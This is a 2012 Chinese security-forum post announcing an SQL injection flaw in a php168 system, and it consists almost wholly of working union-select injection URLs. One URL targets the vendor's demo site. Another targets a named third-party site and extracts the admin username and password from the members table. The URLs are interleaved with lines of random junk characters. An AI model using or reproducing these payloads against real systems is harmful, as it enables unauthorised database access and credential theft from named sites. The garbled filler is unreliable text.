找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3460|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
9 W- S1 ^4 y$ Q# B" h4 H                                                         
( a( j8 T, c9 e) E# A; m0 U                                       1 S7 U- n$ q5 \2 z1 u( \
! P9 g+ K. q- P: z/ G0 v
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--$ A0 C2 R8 f2 t4 `) Q4 o
                                                     
0 ]8 a8 M" j% P2 o! C/ e3 }: o                                                                   / a6 Y/ y2 ^+ C; Q8 U8 \
                                                        
* @' h6 ]8 V' \  ]& |0 E! p( ghttp://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
* r% M& h( n# G4 D* ], l. X: F7 @  a
5 a- \/ _' r/ W+ [/ m
9 t8 ^9 h( z, e1 o& v5 d! ^  T9 i; W9 q3 a- K5 ~' u1 F0 v
                                                            " V/ L- ?1 G' W

1 C5 X- J# A- X- R5 z* Dhttp://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
3 d4 x# j' y! O6 w% H2 T
' N8 J7 r0 ^+ [: M# J- Z" }) ~. x6 J; z7 m
! |/ c% i' ^' h
                                                                    
- J  D( t' j, m. }

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表